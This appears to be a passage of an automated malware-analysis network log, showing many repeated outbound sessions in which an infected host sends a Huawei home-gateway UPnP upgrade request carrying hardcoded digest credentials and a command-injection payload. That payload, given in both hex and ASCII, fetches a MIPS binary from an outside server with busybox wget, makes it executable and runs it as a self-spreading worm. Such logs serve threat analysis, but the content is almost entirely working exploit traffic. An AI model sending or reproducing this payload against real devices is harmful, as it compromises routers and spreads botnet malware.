2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2084192.168.2.1359496157.212.253.3037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.711925030 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2085192.168.2.1344936197.236.36.15137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.712331057 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2086192.168.2.1340688141.240.167.24437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.712395906 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2087192.168.2.135715441.114.78.11837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.712418079 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2088192.168.2.1352574157.237.255.2337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.712457895 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2089192.168.2.1353602157.7.122.5237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.712960005 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2090192.168.2.134812241.184.69.1237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.712976933 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2091192.168.2.135139218.98.96.18937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.713036060 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2092192.168.2.1336924197.67.17.24437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.713052034 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2093192.168.2.1335552157.27.153.7937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.713160992 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2094192.168.2.1341252145.1.195.24037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.713202953 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
